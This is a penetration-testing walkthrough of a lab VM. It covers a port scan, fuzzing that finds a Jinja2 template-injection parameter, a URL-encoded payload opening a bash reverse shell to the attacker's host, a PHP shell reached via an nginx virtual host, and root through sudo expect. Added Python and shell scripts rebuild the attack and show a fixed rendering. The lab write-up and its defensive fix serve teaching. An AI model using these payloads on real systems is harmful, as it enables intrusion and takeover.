# Lab Setup

Download: Flash

Networking: NAT; target IP: 192.168.1.138

# Penetration Testing

# Initial Information Gathering

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http       nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
8080/tcp open  http-proxy Werkzeug/2.3.4 Python/3.9.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/2.3.4 Python/3.9.2
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/2.3.4 Python/3.9.2
|     Date: Thu, 23 May 2024 02:13:10 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.3.4 Python/3.9.2
|     Date: Thu, 23 May 2024 02:13:10 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 18
|     Connection: close
|     <h2>Love you!</h2>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.3.4 Python/3.9.2
|     Date: Thu, 23 May 2024 02:13:10 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|     Connection: close
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|     </html>
|   Socks5: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('
|     ').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>

The 8080 service is a Python (Werkzeug) app, so server-side template injection (SSTI) is the first thing to check. The page returns the same 18-byte body (`<h2>Love you!</h2>`) no matter what is requested, so first fuzz for a query parameter that changes the response; `--hh=18` hides every response of the baseline length.

┌──(root㉿kali)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.138:8080/?FUZZ=36' --hh=18
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://192.168.1.138:8080/?FUZZ=36
Total requests: 4727
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                  
=====================================================================
000002804:   200        0 L      2 W        17 Ch       "name"                                   
Total time: 0
Processed Requests: 4727
Filtered Requests: 4726
Requests/sec.: 0
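The discovery step above, re-created as an added example (not part of the original writeup): a stdlib-only Python fuzzer that applies the same baseline-length filter that wfuzz's `--hh=18` does, run against a constructed local stand-in for the 8080 app. The stand-in (`MockApp`) only mimics the observed response lengths (18 bytes without `name`, 17 with `name=36`) and does not render templates, so nothing is injected here; the six-word wordlist is a constructed substitute for SecLists common.txt.

```python
"""Parameter discovery for the SSTI step: stdlib-only re-creation of the
`wfuzz ... '?FUZZ=36' --hh=18` run, against a constructed local stand-in."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class MockApp(BaseHTTPRequestHandler):
    """Constructed stand-in for the :8080 app. It only reproduces the length
    behaviour seen in the scan (18 bytes without `name`, different with it);
    it does not evaluate templates, so nothing is injected here."""

    def do_GET(self):
        query = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        name = query.get("name", ["you"])[0]
        body = f"<h2>Love {name}!</h2>".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output clean


def start_mock():
    """Serve MockApp on an ephemeral localhost port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), MockApp)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"


def body_length(url):
    with urllib.request.urlopen(url, timeout=5) as resp:
        return len(resp.read())


def fuzz_params(base_url, wordlist, probe="36"):
    """wfuzz's --hh logic: take the unparameterised page as the baseline and
    keep every candidate name whose response length differs from it.
    Returns (baseline_length, [hits])."""
    baseline = body_length(base_url)
    hits = []
    for word in wordlist:
        url = base_url + "?" + urllib.parse.urlencode({word: probe})
        if body_length(url) != baseline:
            hits.append(word)
    return baseline, hits


if __name__ == "__main__":
    srv, base = start_mock()
    try:
        # constructed mini wordlist; use SecLists common.txt against a real target
        print(fuzz_params(base, ["id", "q", "page", "name", "user", "search"]))
    finally:
        srv.shutdown()
```

Length filtering is a heuristic: a parameter that is read but echoed with the same length as the baseline would be missed, so on a real target also compare word counts or hash the body, as wfuzz's `--hw`/`--hs` options do.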

The fuzz turns up the `name` parameter. Test for SSTI with the usual Jinja2-style walk from the template's `self` object to `builtins.__import__`: `{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}`. The output of `id` comes back in the page, so the parameter is rendered as template source and we have command execution as the web user.

Reverse shell (listener on 192.168.1.129:4444): http://192.168.1.138:8080/?name={{%20self.__init__.__globals__.__builtins__.__import__(%27os%27).popen(%27bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.1.129%2f4444+0%3e%261%22%27).read()%20}}

The payload has to be URL-encoded: the bash one-liner contains `&` (in `>&` and `0>&1`), which would otherwise terminate the `name` parameter, and the spaces and quotes need encoding too.
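Why the payload works and how the app should have been written, as an added example rather than the target's own code: the target's source is not known and is assumed to concatenate `name` into the template string, since that is the only way `{{ ... }}` arriving in a query parameter gets parsed. The block uses Jinja2 directly instead of Flask, puts the vulnerable render next to the fixed one and a sandboxed one, and builds the URL-encoded reverse-shell URL from the previous step with `urllib.parse.urlencode`. `PROBE`, `RCE_ID`, `decoded_param` and the function names are this example's own.

```python
"""Vulnerable vs. fixed rendering of the `name` parameter, plus the URL-encoded
reverse-shell URL. Added example: the target's source is not known and is
assumed to look like render_vulnerable()."""
import urllib.parse

from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment


def ssti_payload(expr):
    """Writeup's payload shape: from the template's `self` (a TemplateReference)
    to its __init__'s module globals, then to builtins, then to __import__."""
    return "{{ self.__init__.__globals__.__builtins__.__import__" + expr + " }}"


RCE_ID = ssti_payload("('os').popen('id').read()")   # exactly the page's probe
# Deterministic probe for the checks below: same object walk, no subprocess.
PROBE = ssti_payload("('string').digits")


def render_vulnerable(name):
    """User input is concatenated into the template SOURCE, so Jinja2 parses
    and evaluates whatever {{ ... }} it contains."""
    env = Environment()
    return env.from_string(f"<h2>Love {name}!</h2>").render()


def render_fixed(name):
    """Input is passed as DATA: the template is a constant and `name` is
    rendered verbatim (and HTML-escaped), never parsed."""
    env = Environment(autoescape=True)
    return env.from_string("<h2>Love {{ name }}!</h2>").render(name=name)


def render_sandboxed(name):
    """If user-controlled template source really is a requirement, the sandbox
    refuses the dunder walk. Returns the rendered text or the SecurityError."""
    env = SandboxedEnvironment()
    try:
        return env.from_string(f"<h2>Love {name}!</h2>").render()
    except SecurityError as exc:
        return f"blocked: {exc}"


def reverse_shell_url(base, param, lhost, lport):
    """The writeup's shell URL, built with urlencode so that `&`, `>`, spaces
    and quotes in the bash one-liner cannot break the query string."""
    cmd = f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
    # popen() receives the command in single quotes, so cmd must not contain one
    return base + "?" + urllib.parse.urlencode(
        {param: ssti_payload(f"('os').popen('{cmd}').read()")}
    )


def decoded_param(url, param):
    """What the server sees after decoding; handy for checking the encoding."""
    return urllib.parse.parse_qs(urllib.parse.urlparse(url).query)[param][0]


if __name__ == "__main__":
    print(render_vulnerable("{{ 7*7 }}"))    # <h2>Love 49!</h2>
    print(render_vulnerable(RCE_ID))         # <h2>Love uid=...!</h2>
    print(render_fixed("{{ 7*7 }}"))         # <h2>Love {{ 7*7 }}!</h2>
    print(render_sandboxed(RCE_ID))          # blocked: ...
    print(reverse_shell_url("http://192.168.1.138:8080/", "name",
                            "192.168.1.129", 4444))
```

The fix is not about filtering `{{`: any route that builds template source from request data is exploitable, and the correct shape is a constant template with the input passed as a render variable. The sandbox is the fallback for genuinely user-authored templates and still lets harmless expressions such as `{{ 7*7 }}` evaluate.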

# Privilege Escalation

`sudo -l` shows `ccal`; I tried it but found no way to exploit it.

A glance at `ps -ef`: the `randy` user looks like a rabbit hole, so back to the www side and drop a PHP shell into the web root.

Requesting it gives a download instead of execution, so nginx is not passing the file to PHP. Check the config: /etc/nginx/sites-available/default

It contains `server_name loveyouuuuu.nyx;`, so the PHP handling is tied to that virtual host; a request to the bare IP lands in a server block that serves .php as a static file.

Add the name to the hosts file on the attacking machine (`192.168.1.138 loveyouuuuu.nyx`), request shell.php by that hostname, and catch the returned shell.
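An added example (not from the writeup) for the virtual-host step: parse an nginx config for its `server` blocks, report which `server_name` actually routes `.php` to FastCGI, and probe the uploaded file with a matching `Host:` header instead of editing the hosts file. The config embedded below is constructed to reproduce the symptom and is not the box's real `/etc/nginx/sites-available/default`; the FastCGI socket path, document root and the `CONF_FILE`/`TARGET` variables are this example's assumptions.

```shell
#!/bin/sh
# Added example: map nginx vhosts to "does it execute PHP?" and probe the
# uploaded shell with the right Host header. Not the box's real config.

# Constructed config reproducing the symptom: the default server has no PHP
# location (so shell.php is served as a download), the named vhost does.
# Socket path and document root are assumptions.
SAMPLE_CONF='
server {
    listen 80 default_server;
    root /var/www/html;
    index index.html;
}

server {
    listen 80;
    server_name loveyouuuuu.nyx;
    root /var/www/html;
    index index.php index.html;
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php-fpm.sock;
    }
}
'

# Print one line per server block: "<server_name or _default> <yes|no>",
# where yes means a `location ... .php` exists inside that block.
vhost_php_map() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*server[ \t]*[{]/          { inblk = 1; name = "_default"; php = "no"; depth = 0 }
        inblk && /^[ \t]*server_name/     { sub(/^[ \t]*server_name[ \t]+/, ""); sub(/;.*/, ""); name = $0 }
        inblk && /^[ \t]*location.*\.php/ { php = "yes" }
        inblk {
            depth += gsub(/[{]/, "{") - gsub(/[}]/, "}")
            if (depth == 0) { print name, php; inblk = 0 }
        }
    '
}

# Request a path through a given vhost without touching /etc/hosts.
# php-fpm answers text/html; a static .php hit comes back as
# application/octet-stream (the "download" seen above).
probe_php() {  # $1 = target IP, $2 = vhost name, $3 = path
    curl -s -o /dev/null -w '%{http_code} %{content_type}\n' \
        -H "Host: $2" "http://$1$3"
}

CONF=$SAMPLE_CONF
if [ -n "${CONF_FILE:-}" ]; then   # e.g. CONF_FILE=/etc/nginx/sites-available/default
    CONF=$(cat "$CONF_FILE")
fi
vhost_php_map "$CONF"

# Only probe a live target when TARGET is set: TARGET=192.168.1.138 sh vhosts.sh
if [ -n "${TARGET:-}" ]; then
    vhost_php_map "$CONF" | awk '$2 == "yes" { print $1 }' | while read -r vhost; do
        printf '%s -> ' "$vhost"
        probe_php "$TARGET" "$vhost" "/shell.php"
    done
fi
```

Run without variables it only prints the vhost map for the constructed config; with `TARGET` set it sends one request per PHP-capable vhost, and a `200 text/html` (or a hanging request, for a reverse-shell payload) tells you the file was executed rather than served.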

In the new shell, `expect` can be run via sudo.

`sudo expect -c 'spawn /bin/sh;interact'` gives root: expect spawns /bin/sh with sudo's privileges and hands the terminal over to it.